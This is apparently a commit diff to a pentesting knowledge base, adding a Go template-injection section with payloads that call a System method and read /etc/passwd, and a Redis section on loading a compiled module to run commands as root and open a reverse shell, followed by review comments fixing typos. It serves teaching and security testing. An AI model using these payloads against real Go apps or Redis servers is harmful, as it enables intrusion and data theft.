GitBook: [master] 472 pages modified

This commit is contained in:
CPol 2021-05-27 10:20:50 +00:00 committed by gitbook-bot
parent 003cba43da
commit 9e80c3be33
No known key found for this signature in database
GPG Key ID: 07D2180C7B12D0FF
2 changed files with 28 additions and 0 deletions

@ -343,6 +343,16 @@ Even if it's perl it uses tags like ERB in Ruby.
<% perl code %>
```
### Method Confusion in GO
It's possible to **call methods of the object** that is passed to the context of the template.
For example if an object has the method `System` to execute a command or the method `File` to read a file you could achieve **RCE** o **read arbitrary files** with:
* `{{.System "whoami"}}`
* `{{.File "/etc/passwd}}`
More information in the original research [https://www.onsecurity.io/blog/go-ssti-method-research/](https://www.onsecurity.io/blog/go-ssti-method-research/)
## BlackHat PDF
{% file src="../.gitbook/assets/en-server-side-template-injection-rce-for-the-modern-web-app-blackhat-15.pdf" %}
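Review bot: the second example payload in the "Method Confusion in GO" list is missing its closing double quote: `{{.File "/etc/passwd}}` should read `{{.File "/etc/passwd"}}` so the template actually parses and readers do not copy a broken line. In the same paragraph, "achieve **RCE** o **read arbitrary files**" should be "achieve **RCE** or **read arbitrary files**", and the new `## BlackHat PDF` heading should be separated from the preceding link by a blank line so GitBook renders it as a heading rather than running it into the paragraph.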

@ -167,6 +167,24 @@ The last exampleis for Ubuntu, for **Centos**, the above command should be: `red
This method can also be used to earn bitcoin [yam](https://www.v2ex.com/t/286981#reply14)
### Load Redis Module
1. Following the instructions from [https://github.com/n0b0dyCN/RedisModules-ExecuteCommand](https://github.com/n0b0dyCN/RedisModules-ExecuteCommand) you can **compile a redis module to execute arbitrary commands**.
2. Then you need some way to **upload the compiled** module
3. **Load the uploaded module** at runtime with `MODULE LOAD /path/to/mymodule.so`
4. **List loaded modules** to check it was correctly loaded: `MODULE LIST`
5. **Execute** **commands**:
```text
127.0.0.1:6379> system.exec "id"
"uid=0(root) gid=0(root) groups=0(root)\n"
127.0.0.1:6379> system.exec "whoami"
"root\n"
127.0.0.1:6379> system.rev 127.0.0.1 9999
```
6. Unload the module whenever you want: `MODULE UNLOAD mymodule`
### LUA sandbox bypass
[**Here**](https://www.agarri.fr/blog/archives/2014/09/11/trying_to_hack_redis_via_http_requests/index.html) you can see that Redis uses the command **EVAL** to execute **Lua code sandboxed**. In the linked post you can see **how to abuse it** using the **dotfile** function, but [apparently](https://stackoverflow.com/questions/43502696/redis-cli-code-execution-using-eval) this isn't no longer possible. Anyway, if you can **bypass the Lua** sandbox you could **execute arbitrary** commas on the system. Also, from the same post you can see some **options to cause DoS**.
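Review bot: the "LUA sandbox bypass" paragraph contains a double negative that inverts its meaning: "this isn't no longer possible" should be "this is no longer possible" (the cited Stack Overflow answer is being used to say the dotfile trick no longer works). Two lines later, "execute arbitrary commas on the system" should be "execute arbitrary commands on the system". Step 2 of "Load Redis Module" ("Then you need some way to **upload the compiled** module") states a prerequisite without documenting it; either link the relevant upload section of this page or note explicitly that the module must already be present on the server's filesystem at the path given to `MODULE LOAD`, since the snippet in step 5 assumes it loaded successfully. Finally, "This method can also be used to earn bitcoin [yam]" is ungrammatical and unclear about what "yam" refers to; consider "This method can also be used to mine bitcoin ([yam](https://www.v2ex.com/t/286981#reply14))" or similar wording that names the linked resource.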